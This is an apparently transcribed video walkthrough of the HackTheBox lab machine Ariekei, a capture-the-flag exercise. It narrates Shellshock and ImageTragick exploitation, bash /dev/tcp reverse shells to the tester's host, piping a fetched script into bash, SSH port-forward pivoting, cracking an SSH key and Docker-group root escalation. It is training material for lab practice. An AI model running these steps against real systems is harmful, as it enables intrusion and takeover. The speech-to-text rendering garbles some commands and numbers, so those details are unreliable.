What's going on YouTube? This is IppSec and we're doing Ariekei from HackTheBox, which is all about network pivots. And we're going to do something a little bit different in this video, and that's kind of show how the machines are architected because it's one host machine, 4 different Docker containers. And if we didn't do this, it may be hard to follow along by just watching and listening. So we're going to jump over to a graphic the machine creator did to explain this box. So this is how Ariekei is laid out. We got the VM up top here. Then down below you have 4 different Docker containers. The left side is ariekei-live.net, the right side is ariekei-test.net, and down the middle are machines on both networks. The first thing you probably came across was port 443, and that goes all the way down to this WAF Live, which is a web application firewall. This guy can either send traffic to the test side or live side. It's dependent on the host name, and I think it defaults to live. Since this is port 443, this has to have a SSL certificate that identifies both sides unless you're going to get SSL certificate errors. So that's why when you view this SSL cert on this box, you can actually identify the test subnet and get this box to route traffic to test from outside the Ariekei box. But once you get on test, you're supposed to pivot into the Bastion, which is dual homed. That allows you to connect to Calvin directly without going through this web application firewall, and that's why you can do the Shellshock from this box. And then once you do that and get on this box, there's information that lets you pivot into the host or Ariekei. And then from that, you can use Docker to PrivEsc. So hopefully this little thing makes sense once we start going through the box, and yeah, let's just jump in and do the recon. Like every box, let's start off with the Nmap. So Nmap-SC for default scripts, SV, enumerate versions, OA, output all formats. We'll put in Nmap initial, then the IP address of Ariekei, which is 10.10.10.65. Already ran this, so let's just look at the results. We have SSH listening on port 22, Nginx, which is HTTP, listening on 443, and OpenSSH again, listening on port 1022. This is the first odd thing we see is SSH listening on 2 different ports. If we look at the SSH host key, we do have them being different at the 2048-bit A75B, 7840. We also have different Ubuntu versions in the actual header. So this is a hint that there's some type of network address translation going on and multiple hosts. The other hint is we have Nmap saying subject alternative names, DNS is Calvin.Ariekei.htb and Beehive.Ariekei.htb. But let's just look at the Ubuntu versions. To Ubuntu 2.8, I believe, is trusty. So if we just Google that, actually we have to do it over on this right side. Then we can go to Launchpad and see this is uploaded to trusty. And then we can do this right side, which is not right side, for Ubuntu 2.2. Go to Launchpad, and we see this one is Xennial. So chances are the first SSH we're going to want to hit is the older version because older things are more likely to be forgotten about or not patched. So this SSH is probably the first chain, but we'll always try them twice. It's just a nice little hint of targeting older things before targeting the newer things. Let's go check out the website at 10.10.10.65.443. So go into Firefox, 10.10.10.65, fail to connect because we don't have HTTPS. It's not listening on port 80, so it doesn't forward us. We do have just a maintenance page. If we look at the page source, nothing really there. So first thing we're going to do is start GoBuster so we can have that going in the background while we play with things. So we'll do opt GoBuster. I'm really going to add this bit on my path one time, so I don't have to do opt GoBuster every time. But we'll do -H, and we'll do -K to ignore certificate checks. We want -U to do a URL, which is HTTPS 10.10.10.65. -W for word list. We'll do user share word list. GoBuster. I normally do 2.3, but this one it should be in 1.0. And I'm also going to do a status code because we want to see 403s. I don't like that GoBuster doesn't default to that. So we'll add 403 in that, which is authorization an authorization error, access denied. So if we start that off, we'll do -T50 so it goes a bit faster. And then we can begin poking around at the host names. If you want to know how Nmap pulled that, you can just go to the SSL certificate, view cert, details. I may have to go. On the alternative names, we have DNS name at Calvin.htb and Beehive.htb. So that is how Nmap pulled that. And let's see if they actually do anything. So open up burp, turn intercept on, refresh, send this into repeater. We could name this VirtualHostRouting test. If we click go, when a host is just 10.10.10.65, we get this not modified page. And we also get x-Ariekei-WAF, which is the biggest key that we're going through a web application firewall. And the host name it defaults to is beehive.ariekei.htb. Let's delete the headers on our side on a request that relate to cache. Click go. We get something weird. That is the page when you trigger the WAF. And I think it's because we have just 3 empty lines here when you're supposed to just have 1 empty line. Yeah. So there we go. We're at Ariekei's page. And I say Ariekei's page because we see this WAF header telling us we're being forwarded to beehive.ariekei.htb. If we change this host to the other one, Calvin.ariekei.htb, I misspelled that, Calvin, we get a completely different result, 404 not found. So that's your hint, there's some type of virtual host routing going on, and we don't have any HTTP header. So maybe this isn't going, well, it's going through the WAF, but maybe the WAF isn't doing anything or something. It's odd the WAF header is not in this request. Maybe it's just not in the 404s. Going back to our GoBuster, we have /blog discovered, so let's check that out. Disable burp. Go to /blog. We have to do HTTPS. And we get a bootstrap page. This looks like WordPress, but if we do like /wp admin, we don't have anything. And if you viewed the source, you'd see it's probably just a completely static site. Another thing you could do is go into burp, go to your target, go to 10.10.10.65 blog, spider this branch, and we'll see what comes back. Mail. Oh, we got a PHP script potentially. Let's try mail/contact_me.php. I actually didn't notice this before. And it's actually giving the source code to the PHP script, so PHP is not even being executed here, so we can completely ignore this. Vendor, bootstrap, bunch of HTML. So it not actually executing this PHP is a big indicator that this /blog is a completely static site because it's not executing PHP files. Something just good to note. We can go back to a GoBuster, and GoBuster hasn't found what I'm looking for yet. It's supposed to find a cgi-bin, and just hasn't. So let's look at the word list, and we'll see where cgi-bin is there. And actually, I don't even have to search. It's the very first thing in this word list. So let's see what's going on. If we go to a web browser, actually go to burp, and we can do cgi-bin to see what it says. We have to go to Beehive, so just put anything in the host, and it defaults to that. We get 404, put a slash, and now we get that 403. So that's what we want to do. I forgot one flag on GoBuster, so let's terminate it. And we can actually show that. So slash cgi-bin with no slash, 404. Slash blog with no slash, we get a 301. But in GoBuster, if we add a, I think it's a dash F, let's just go up here, search for it. Yeah, dash F appends a forward slash to each directory request. So let's add that in our GoBuster command. And now we get slash cgi-bin. So we can take that out, so we're no longer brute forcing directories, and just do a directory list maybe. That should be fine. Oh no, we have to change it to slash cgi-bin slash. And now we'll see if we find any files in there. The file we're actually looking for, so we're not waiting for that to finish, is called either stat or stats. Stat is not found. Stats is. So this should find stats eventually. We may have to do 2.3. But you can take my word that if it makes the request, the file will come back. There's no magic there. I'm just impatient and don't feel like waiting. So if we look at stats, we get this big thing to come back. It shows our bash version, which is 4.2.3, and this is actually vulnerable to Shellshock. If we just Google bash 4.2.3.7, Shellshock comes up. So if we wanted to try Shellshock, we could easily do so by turning intercept on, going back to this CGI, refreshing, sending it over into repeater with Control R. If you do Control Shift R, it automatically goes to the tab. And we can change this user agent. We can call this Shellshock to something that's shell-shockable. So open quote, that, then we can do echo, bin, is it bin who am I? Oh, stats finally came back. So there you have it. Which, who am I? User bin, who am I? And we get this back. So this is a taunt from the actual web application firewall. And the very first thing I did when I saw this is, well, I knew something was there and something stopped me. It didn't make it to the server because this code should never translate into this. So I just set one parenthesis and we get the thing back. Open and close parenthesis. Get this back. Open close parenthesis with the curly bracket. And that's when we get the actual web application firewall. Maybe if we just do close parenthesis space, squiggly bracket, nothing. So the actual signature is based upon this. So the next thing is add a few spaces. Spaces don't seem to break the signature. Spaces in. Oh, and have a space after that, which is a requirement for Shellshock. So spaces don't break it. I tried to do like IFS, which this variable is space by default. And we can look at the user agent. It's not parsing that. We could just do, I think that is also going to be translated into a space. Doesn't translate it. We can try to fuzz something in this to get it to execute. But then it breaks Shellshock. So Shellshock doesn't work when we start putting things in. You could keep trying to fuzz this. I didn't find a way around the Shellshock signature, so I moved on. It took about 15 minutes of fuzzing, and I was like, this is probably a rabbit hole. Let's just look at that other host name that we saw when we were dir busting. So let's go into our host file to making the request easy. We can say 10.10.10.65 goes to both Beehive.Ariekei.htb and Calvin.Ariekei.htb. Turn burps intercept off, and we can do /up, jumping ahead of myself, https calvin.htb, not htb, ariekei.htb. We get this not found page. First few things we can try is like robots.txt, nothing. We saw /blog, nothing. cgi-bin, nothing. So we can start a GoBuster up to try to find it. If we do HTTPS now, Calvin.htb, not Ariekei.htb. I'm not used to there actually being a subdomain. Tell that to go. Eventually, GoBuster is going to find a /uploads. It ends with the slash, so we need to add that -f flag. Or is it /upload? /upload. We don't have to have that -f. We actually can't have that -f. So we got upload image here. We can look at the page source to see where it goes. And we don't see anything. We could try to guess on an upload folder, because if we want to upload a malicious file, we have to know the upload folder. So we can do /upload, /uploads, try to find that. Or, this is also a hint, we got two masks here, and these are tragedy, I guess. If we Google tragedy mask, you may be able to pick up on the reference to that image. And there was an exploit around uploading images called ImageTragick. So that's why this ASCII alert hints at ImageTragick, because you're supposed to think, oh, there's a file upload, what a tragedy. Or image upload, what a tragedy, and hence ImageMagick. So that was a nice little hint for that. Maybe David Laundra is another hint, but I think the hint is the masks being with tragedy. So if we want to, we can Google ImageTragick and see how that exploit works. So ImageTragick.com. That's mitigating it. Here's the actual exploit. You essentially upload a MVG, and this fill parameter in the ImageTragick library was command injectable. So if we create a MVG, not MVB, MVG, and put that, this should execute ls-la, but we don't want to do that. We want to get a reverse shell. So if you did more looking into ImageTragick and looked at the actual payloads that people sent, this Cloudflare post was a good one that says the real payloads being used to hack for ImageTragick. And scroll down, you get a much better fill that does a set sid to create a new session, then does bin bash and reverse shell. So let's use this one instead of the ls. Okay, and our IP address, I think I'm 10.10.14.60. Let's just verify. 1430. Okay. That looks good. NC LVNP 1443. Go back into ImageTragick, browse, root, documents, HTTP, boxes, Ariekei, MVG, and upload. We get a fail to connect, and nothing back. Let's look at the file we created. Cat IppSec.mvg, user bin. That should have worked. 10.10.14.30. Set sid bin bash dash I. Oh. Is that? I don't know if that's the right shell. Let's look back at that web blog to see if it copied right. It's tragic. It says it copied right. Let's go back. Do nc lvnp 443 in a burp history. So not sending that through burp. That's a bummer. That should have went through burp. Huh. HTTPS Calvin upload. Browse. IppSec MVG. Upload. That is not hitting my burp proxy. Not sure why. Oh well. Let's just edit IppSec MVG. And I think we need, is it like that? Go back, browse, it's like this. Let's disable, enable. I want you to get a burp. There we go. Now this makes it a bit easier to send it a bunch of times. Send this request. Nothing. Oh, is /20 is 22 hex for that? Did Cloudflare just purposely break that? Encode as hex 22. That may fix it. That did. So the Cloudflare blog just had this one thing encoded. So that's all that was wrong. I do want to play with one thing real quick. Let's see if we can get that ls to work for a proof of concept. So I think I just noticed why ls wasn't working before when I was playing around with it. So if we go to ImageTragick, let's see. Copy this line, back in repeater, paste this, go. You should be redirected to this. We need to put HTTPS in that redirection. And I can't edit that. We go to proxy, intercept on. Should be able to edit here. Back, browse, IppSec, upload, paste the ls. We also want to go into options, intercept server, response, forward. We get the 302 found. It's redirecting us to URL. We want it to do HTTPS. Forward, get HTTPS. Oh, that's Stack Exchange. Okay, it doesn't work because we can never view the image. It doesn't have any standard out. But the key thing is doing something out of band. And when ImageTragick went first around, a lot of people had done ping commands and pinged back to them. And there's also this set SID that we could also just do to get a reverse shell. But ping, a lot less malicious and may not get in trouble for doing it, still not recommended. But if you're doing a bug bounty program and getting shells is out of scope, do a ping, and that will prove it's vulnerable to ImageTragick while keeping you out of jail. And as a bonus, most servers can ping out to the internet. You could also do DNS requests and things like that. But now we're on Calvin. Let us do the Python TTY shell. So import pty, pty.spawn, bin bash, TTY raw minus echo. So now we have a TTY where we can do tabs, control C, and not kill a session. So we'll call this Calvin. And if we do ifconfig, not found, ipaddr, not found. So we can't really look at our IP list. Or not IP list, IP address. Maybe we'll go in var-log, cat yum. Could potentially find it there, but all those commands just pull information from proc. So procnet, we have TCP, and that is a lot of TCP. I think 0A in this column means listening, I want to say. But I'm not 100% positive how to read this off the top of my head. I want to say 7F80. 7F to hex. Let's see what that is. 7F to decimal. 7F. Convert hex is 127. No. One of these, you can Google how to read this table, but the state is either listening or what state the socket is in. And then this local address, one of these is ports. I bet 1F90 is 80, actually, looking at this. You got the local address, so this is IP, port. 0A is definitely listening. And we have all these 1F90s. So there's probably a lot of things on port 80. So if we do convert, 1F, value is 8080. So yeah, that is correct. So this server is listening on 000 port 8080, and the WAF directs it to that. We can also probably search this for 443, which I believe is 1090. Machine was going a little slow there. 1090. Maybe not. I would think we'd see something in the second column, which is a reverse shell, but that's not important. That is not where we're looking for. I was just trying to explain something, and that fell a bit flat. We need to find where the IP is, and I think that is an IPMRVIF, maybe? No, that is not it. Let's see. ICMP. Not that. Is it stat? No. Net filter. No. One of these files will be it. It's not a IP. Let's see. Cat fib tree. There it is. this is the file I was looking for in /proc. It's been a while since I looked at these, but we have /32host local, and then this. So 172.23.0.11 is the IP address. The other /32host local is 127.0.0.1. So that is kind of how you can read how ifconfig and things work. It all parses out of this /proc file structure. So we know we are the IP address of 172.23.0.11. Doesn't really do us much. We could also cat the IRP thing, and we see there's 172.23.0.252, 172.23.0.1, and again we had to do that because the IRP binary isn't here. This is common in Docker. Is a lot of the binaries won't be there because they're not needed by the program, so that's why you have to learn about this /proc stuff. 0.1 is the gateway. 0.252, this is the web application firewall. But all that stuff isn't really important. I just wanted to show that because that's something I look into. And I'm not going to do the lin-enum script because all the binaries aren't there. So I'm just going to do a ls-la on / and see what we see. Right in the very root, we have .dockerenv, so let's look at that. Less isn't even there, so let's cat the file. That is empty. There is common. I've never really seen common before. And we do ls-la. There's a hidden thing called .secrets, and inside of .secrets is a bastion key. So I'm going to cat bastion key pub, and we see that is for the root user. And we're just going to copy this. The bastion key. Paste it. chmod 600. Bastion key. And just save that for later. Let's look into what network is. If we cat make nets, we do see a script for creating Docker containers with a 172.24.0 subnet and a 172.23.0 subnet. So this is the very first clue I think we have to the actual network of the shell-shockable machine. And we are, what did I say we were? I think we are 172.23 proc net fib tree. Yeah, we are 172.23. So we want to get to the 172.24 network, and this machine cannot do that because we can't route there. We can go into containers, see what is in here. We have the WAF live. If we look at this, we don't have less. Let's just do cat. .config. This is for SSL certs. Cat start.sh. Connect to 172.24.0.252. So let's see if we can ping that address from this box. And we can't. So we could keep poking around these containers, or we can just try using our SSH key that we got from Ariekei and SSHing somewhere. So LSLA, it is chmod to 600, so we can use this key, SSH-I bastion key to 10.10.10.65. We get denied. Remember, we have SSH also listing on port 1022, so we can try that. And we'll see if this one lets us in. It's definitely taking a while to get there. And we get on and automatically root at Ezra. We do a ifconfig. We have 172.23.0.253 and 172.24.0.253. So 253 on both these networks. If we go up, go back to Calvin, the WAF was on 172.23.0.252. So we now know we're on a box that we haven't met before. And if you remember from the diagram, this is that Bastion host that is dual homed. So let's try accessing curl 172.24.0. Let's see. Go back to Calvin. What was that? Proc command. Calvin is 172.23.0.11. So let's try 24.0.11. Curl is not a command. wget. And they didn't reuse the last octet because 24.0.11 port 80 doesn't connect. We can try 8080. And it still doesn't connect. So we're still a little bit stuck on where to go. We can do up-an to see if we're talking to anything. We have 172.24.0.1, 0.2. 11 is incomplete because we couldn't get an ARP. And we still just have to poke around Ezra to find out where we want to go. Go back to slash. We can go into common. Look in network. Still the same thing. We don't have any specific IPs, just networks. So go into containers, and let's go into convert live. If we cat start 23.0.11, convert live is the one that we did ImageTragick on. Blog test is the one we want to get into. So cat start.sh, and we see Ariekei is listening on IP 172.24.0.2. See what else Ariekei has. If we go in CGI, we have that stats file. If we go into config, we have Apache 2 site and sites available, so we could go to cd sites available, cat default, and see he's listening on port 80. Well, if we go to sites enabled, default's the only one enabled, and port 80. So let's do a wget again. Instead of .11, let's do 172.24.0.2, and we start trying to write a file. So now we know we can access the other host, Beehive. So wget, I think, has --user-agent to specify, and we can do Shellshock. I don't know why my host keeps hanging like this. There we go. Echo user bin, who am I? To 172.24.0.2 cgi-bin stats, and then we cat that file. We have www-data. So we know we have code execution there. We could do a reverse shell to this, but I'm going to do something else. So this is Ezra. So on this box, we could probably either use tmux or screen, or just SSH again, and then use ncat, because ncat is on this. But let's do SSH tunnels, because that's something we haven't really covered that much. So you could do it with SSH-L and then that, but once you're in an SSH connection, you can hit the squiggly key, which is that, and it has to be the very first thing you do on a line. So if I just hit that squiggly C, which is what I want to do, nothing happens. But if I'm on a new line and do that, I drop into this SSH prompt. We can do help and look at the commands I can do, and there's -L, -R, and -D. These are the three things that we'll be playing with. -L is a local port forward, -R is a remote port forward, and -D is dynamic. So you can think of -L as, we don't have to echo that. So -L is local. So we're going to listen on a port. So on our host, we will localhost. We can specify it this way. 127.0.0.1. It's not really listening. Well, it is really listening on that, but that's your local host listening on a port. So we can say we want to listen on port 8001, and anytime we send something to this port, we want to direct it to the server. And we can direct it anywhere. We could say, hey, send this to localhost, or we could say send this to a remote host. In this case, we want to send it to 172.24.02 port 80. So that is -L. And that syntax would go like -L 8001 172.24.02 80. The -R is the reverse. It is going from the reverse host. So this will be your SSH target listening on port, we'll say 8002. And that's going to be sending it to us. And we can send it anywhere on our network. So if we sent this to another box on our local network, we could do it that way. Maybe it'll make sense in a second. We can say 8003. So let's do that real quick. So we do -C, or squiggly C, then -L, 8001, 172.24.02, 80. So now it's forwarding a port on my local host. So if I do netstat alnp grep 8001, I'm now listening on port 8001. And if I curl 170.0.0.1 on port 8001, I go into Beehive. And if Beehive connects back to Ezra on port 8002, it's going to direct them to port 8003 on me. So if I do nc localhost 8002, that should have went to me. Oh, I haven't done the -R yet. So -R 8002, so that's going to be the SSH target listening on port 8002, and he's going to be sending it through the SSH connection. And then after it gets through that SSH connection, let's go to localhost on port 8003. So now when I nc localhost on 8002, it connects, and we can see that works. So what that magic allows us to do is now we can do curl. I think -A is for agent. We can do Shellshock. Actually, I want to cat my thing because I have the nice Shellshock reverse shell here. But we can do curl -A Shellshock echo. I don't think we need both of those echoes, but oh well. Then bin bash -I dev tcp, and we have to do Ezra's IP address, which is 172.24.0.253. And this is going to be, we did port, I think L? No. Dot closes. Forget how to list. If you ever forget, you can Google Konami code SSH. And you get a nice Sans post by Jeff McJunkins, which explains all this. Or McJunkin. Let's see. Dot terminates, B sends a break, C request rekey. List is with pound. That's connections open. There should be one that lists forwarded connections. Huh. I swear there's one that lists all the things that are open, because that's definitely not what we're looking for. But I think we're listing on 8002 and sending it to 8003. So we'll do 8002. And then we need direct standard out to 1, and then standard error to that. That should be good. And see LVNP 8003. If all goes well, this will hit us. So localhost on port 8001, cgi-bin, stat. Stats? There we go. And there we have it. Shellshock came, and it went through that host. So you can open this up again real quick. Full screen. So we're outside here. We go in, and we use this Bastion. Whoops. And we have port 8002 open here, and that's forwarding us all the way back out to our host. How to explain? I'll look at something where I can draw on my screen easier, because it would be much handier if I could just write on that image. But that's how SSH things work, or SSH forwarding. And this is now Beehive that we're on. And now that we're here, let's do Python import pty, pty.spawn, bin ssh, sty raw minus echo. Okay, so we're on Beehive. And if we go to common, we can go back into containers and start looking at things. So since we're on blog test, let's go in blog test and see if we see anything. We got the build, nothing there. Config, doesn't look like it. We don't have if config or IPP80. Oh, we do have IP80 on this one. So this is a slightly different build than the Calvin, because we didn't have IP on Calvin. Do we have netstat ALNP? No, we do not. But I bet if we cat proc net TCP 0A and 50, that is port 80. So if we go here, 0x80, do decimal. No, 128. Now I'm just confused. We'll worry about this another time. If you want, you can Google how to read this, but I'm almost positive. I don't know. I'm doing something wrong when trying to read that. 08 is listening, though. I really should do more research before I start these videos. But anyways, let's just keep going, see if we can find a file of interest. So we can look at the Bastion Live. Cat start sh. Don't really see anything too interesting. Cat build here. Don't see anything. SSHD looks interesting. So let's go in there. Oh, we just cat it. That's the SSH file. We can cat Dockerfile. And we have a password. active root password and all the other ones in Dockerfile. I think this directory is shared amongst all the Docker containers. So let's go to Ezra /common containers bastion cat Dockerfile. Yeah, that password's in all of them. And the only reason we didn't look at it before is because we are already root. So if we go to Calvin as well, both of those are running as root. So if we do su to switch to root user, we can paste this password and escalate. So now we'll root amongst all 3 Docker containers. If we go to /home, there is Spanish Dancer. And if you do wc, or if you cat user.txt, it'll show you the contents. We'll count the characters and say, hey, there's 32 characters in this file, and then a line break, which makes it 33. So that is the file to get user.txt. We can look in the content folder. That is the blog that we saw for the website. If you do ls-la, there's a .ssh directory, and this has another SSH key. And if we cat idrsa.pub, we get its username is Spanish Dancer. So let's copy this, and this one is a encrypted key. So let's see, v Spanish Dancer, that's one thing, idrsa, paste it, and then we have to now crack it. So let's SSH into not my VM because cracking from VM is very slow. Go into my Kraken box. We can create the key, so Spanish dancer.ssh, paste it, then John the Ripper because Hashcat doesn't really do keys. It's really the only reason I ever use John is for SSH keys, I think. We run sshng to John to convert this key into a format that John will crack. Root Spanish dancer.ssh. Spanish dancer.ssh.crack. And then we can do John root Spanish.crack word list. And then we can try opt word list rocku.txt. It's running, and it's already cracked it as purple1. So we can get out of here and try SSHing sh-i Spanish Dancer to 10.10.10.65, and we need to be the Spanish Dancer user, chmod 600, purple1, and now we're in, and we see Ubuntu 16.04. If you remember from a recon, that was the host we thought. If we do ifconfig, we have a bunch of interfaces. So this is finally the host machine, and we have to pivot to root. So we can do lin-enum. So opt, let's just copy it. Opt Linux PrivEsc, lin-enum, and then Python m simple HTTP server. We can curl 10, 10, 14, 30, 8000 lin-enum.sh. Pipe that over to bash to run it. Whoops. Go to the top and start looking at what we're seeing. So we knew the kernel as Ubuntu, Xennial. It may have a PrivEsc now for the kernel, but at the time of launch, it didn't. And that's not intended, so we'll ignore that. We are in the Docker group. And this is dangerous. If you remember from Calamity, this is very much similar to the PrivEsc on Calamity, but that was LXC, this is Docker. And it's just dangers of virtualization, or giving your user access to virtualization, because bad things can happen. So we won't even finish with that. And we'll just Google dangers of Docker PrivEsc maybe. Is it possible to escalate privileges escaping from Docker? Privilege escalation via Docker. And TLDR, don't use the Docker group. You can read all this for it, but if you're doing Docker, it's best to just strict people down to sudo, because we can do Docker run, we can map slash to a different directory, and then execute something. So if we just do Docker run, then I don't even know if we need -v. What is -v? Docker run help. Oh, we do need -v. Bind to volume. That's not verbose. So Docker run -v. So bind. We'll do slash to a folder inside of a Docker container. So we'll do /tmp. And then we can probably just do bash. Nope. Docker run -v /temp bash not to bash. What is it? There's something for run command. Maybe -t. There we go. We do ID. Maybe we missed something. Docker run -v /temp -i. Maybe that's interactive. -t bash. So -t allocate tty. -i. Let's see what -i is. LE. I don't know what I is. But that's it. So it helps to do everything the post says. I should have read that. But anyways, -i does something, -t does tty. And now we are root. If we do lsla /root, we don't get anything. But remember, we bound /root over host into the temp directory. So if I go into temp, now we're in another operating system, go into this root, and there's root.txt. So wc-c root.txt, you could get that file. You could also go into like vir, spool, cron, crontabs, vroot, and we could just do every minute do bin bash -i dev tcp 172 no 10 10 14 30. We'll say 8004 and 0 1 2 1. Maybe that's right. I think I've wrote this reverse shell enough where maybe I have it memorized finally. I always mess it up. But NC LVNP 8004. Date. Wait about 20 seconds and we'll see if that cron runs. So let's see. Another 15 seconds left. I should have just split the pane, but oh well. We will wait. About 10 seconds left. So 10, 9, 8, 7, 6, 5, 4, 3, 2, 1, and no shell. So I probably screwed something up. So let's see. Let's go split this pane. We don't need to listen on this port anymore, and we can go into cat sec mvg. So bin bash -i 2 dev tcp 10.10.14.30 8004. Crap. Reverse these. Suppose it didn't connect to us and then just not do anything. And I didn't have an and at the end. We'll try that. Date. Too long, so we can do this and put this down here like I wanted to. 8004. And then we can also server vroot. Let's see if we can type this quick. 1, 2, 3, 4, 5. wget 10, 10, 14, 30, 8000. So wget's just a bit more reliable because it's not a whole reverse shell. Chances are that will work. If we do 10, 10, 14, 30, port 8000, we get a hit there. Date. There we go. We got that cron to run, but we didn't get a reverse shell. So we know we have code execution, but for some reason, we're not getting a reverse shell. So what I'm going to do is we'll just try executing a file. Because if we do that, we can know the file works. Bin bash, no such file, or directory. That should have kept the shell up. C1. Which bash? Use a local bin bash. What? Which sh? User local bin bash. We'll exit this. ID. No. Exit. Back to being Spanish dancer. Which bash? Oh, it is /bin bash. Let's try this again. Docker run -v for volume slash. We'll just do /mnt. That's a bit safer than temp. -it bash cd /mount v ver spool cron ver spool cron tabs v root. Okay. So 10, 10, 14, 30. That looks right. User local bin bash -i. Oh, cat root. User local bin bash. Still testing if this code works. That does. So if we do pwd, so we can go mount v shell.sh bin bash. No, that should work because we've done that shell. chmod +x shell.sh. We can bin bash that. So it definitely knows that's executable. Bin bash bad interpreter. That's fine because we're in user local bin because we're Docker, I guess. Vir spool cron tabs v root. And we can just say /shell.sh. So v shell.sh, and we can touch /pwned first. So now when that script runs, we should know if it errors out on that reverse shell, it should still touch a file. So we should know what's going on this time around. And in 40 seconds, we can get a true shell instead of being in this Docker container with the root volume mounted. Doesn't look like it ran again. And we don't have pwned. But we are getting that cron. That is interesting. I know this is something probably stupid, but I'm just going to ignore the cron now because I'm overlooking something silly, and we're just going to do an easier way. So if we go in Spanish to answer, we can cp.ssh authorize keys to mount root.ssh. We have to go into /mount root create.ssh. Then we can cp home Spanish dancer ssh authorize keys into this directory, chmod 600 authorize keys, and then sh-i Spanish dancer to 10.10.10.65 purple 1, and now we are root, the actual root user. So that's the easier way to do it. Delete all of index, cd /shell.sh did exist, crontab-l 1, 2, 3, 4, 5. That's the correct number. Let's see if we can just execute this. Connection refused. If we nclvmp 8004 a shell, that works. I'm not sure what's going on with that cron. Maybe I just wasn't listening on the right port, and it was something stupid like that. But SSH key is definitely the easier way to do it. So that is the box. Hope you guys enjoyed. Take care, and I'll see you next week.